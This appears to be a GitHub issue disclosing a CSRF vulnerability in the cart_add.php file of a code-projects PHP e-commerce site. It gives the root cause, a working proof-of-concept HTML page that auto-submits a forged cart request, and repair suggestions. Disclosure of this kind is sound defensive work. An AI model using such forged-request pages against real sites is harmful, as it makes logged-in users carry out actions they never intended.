code-projects E-commerce Site Project V1.0/cart_add.php  CSRF Attack

# code-projects E-commerce Site Project V1.0/cart_add.php  CSRF Attack

# NAME OF AFFECTED PRODUCT(S)

- E-commerce Site

## Vendor Homepage

- https://code-projects.org/e-commerce-site-in-php-with-source-code/

# AFFECTED AND/OR FIXED VERSION(S)

## submitter

- balancelee

## Vulnerable File

- /cart_add.php

## VERSION(S)

- V1.0

## Software Link

- https://code-projects.org/e-commerce-site-in-php-with-source-code/

# PROBLEM TYPE

## Vulnerability Type

- CSRF

## Root Cause

- 1. No CSRF token validation in sensitive POST interface
- 2. Simply checks $_SESSION['user'] without verifying intent
- 3. Any third-party site can POST requests to the vulnerable endpoint


## Impact

- Attackers can exploit this vulnerability to perform unauthorized operations, such as adding items to the user's shopping cart, manipulating the order quantity, and even controlling the user's order placement.

# DESCRIPTION

- This vulnerability exists in the '/cart_add.php' file of the e-commerce system. An attacker can craft a malicious webpage and trick authenticated users into visiting it. Without proper CSRF token validation, the backend cannot distinguish whether a request is legitimate or forged. As a result, attackers can perform unauthorized actions such as adding items to a user's cart, manipulating order quantities, launching inventory denial-of-service attacks, and even controlling the user's order placement.

# Vulnerability details and POC

## Vulnerability Name:

- Cross-Site Request Forgery (CSRF)

## POC Example：

```makefile
---

<!DOCTYPE html>
<html>
  <body onload="document.forms[0].submit();">
    <form action="http://localhost/ecommerce/cart_add.php" method="POST">
      <input type="hidden" name="id" value="2">  
      <input type="hidden" name="quantity" value="999999"> 
    </form>
  </body>
</html>
---
```

## The following is the vulnerability exploitation process and the screenshot of the result：


<img width="660" height="238" alt="Image" src="https://github.com/user-attachments/assets/22dd0ab3-70ef-42d8-ad6e-a9cc78e7336d" />

<img width="1576" height="763" alt="Image" src="https://github.com/user-attachments/assets/7600c154-e279-4fc0-9991-17ff51229fcf" />

# Suggested repair

1. **Use CSRF token validation:**
   All sensitive user actions must include CSRF token validation.The following example code can be added:
```php
if (!isset($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}
```
2. **Restrict Referer/Origin:**
   Reject requests without valid Referer or Origin headers.

3. **Submit parameter validity verification:**
   Validate all inputs like product ID and quantity.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

code-projects E-commerce Site Project V1.0/cart_add.php CSRF Attack #3

code-projects E-commerce Site Project V1.0/cart_add.php CSRF Attack

NAME OF AFFECTED PRODUCT(S)

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

Vulnerable File

VERSION(S)

Software Link

PROBLEM TYPE

Vulnerability Type

Root Cause

Impact

DESCRIPTION

Vulnerability details and POC

Vulnerability Name:

POC Example：

The following is the vulnerability exploitation process and the screenshot of the result：

Suggested repair

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

code-projects E-commerce Site Project V1.0/cart_add.php CSRF Attack #3

Description

code-projects E-commerce Site Project V1.0/cart_add.php CSRF Attack

NAME OF AFFECTED PRODUCT(S)

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

Vulnerable File

VERSION(S)

Software Link

PROBLEM TYPE

Vulnerability Type

Root Cause

Impact

DESCRIPTION

Vulnerability details and POC

Vulnerability Name:

POC Example：

The following is the vulnerability exploitation process and the screenshot of the result：

Suggested repair

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions